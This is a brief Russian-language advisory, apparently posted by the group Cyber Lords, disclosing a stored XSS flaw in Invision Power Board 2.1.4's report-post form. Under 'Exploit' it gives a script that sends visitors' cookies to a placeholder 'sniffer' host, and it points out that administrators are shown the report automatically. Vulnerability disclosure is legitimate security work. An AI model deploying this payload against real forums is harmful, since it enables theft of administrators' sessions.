Здравствуйте. Очередная уязвимость найденна командой Cyber
Lords(www.cyberlords.net). На этот раз в продукте Invision Power Board.
Я бы посоветовал вам опубликовать данную уязвимость в отдельную новость.
Advisory: Active XSS in Invision Power Board 2.1.4
Уязвимость/Vulnerability:
Межсайтовый скриптинг/Cross Site Scripting
Нет фильтрации входящих данных. Возможно проведение атаки межсайтовый
скриптинг,
отослав в форме жалобы на сообщение запрос вида:
"<script>alert()</script>".
С помощью данной атаки возможна утечка конфиденциальных данных
пользователя на сторонний сервер.
Форма находится по адресу
http://forum/index.php?act=report&t=123&p=123&st=0
Exploit:
<script>img = new Image(); img.src =
"http://sniffer/file.php?"+document.cookie;</script>
P.S. Далее у всей администрации форума, автоматически появится
уведомление о жалобе.
Cyber Lords
www.cyberlords.net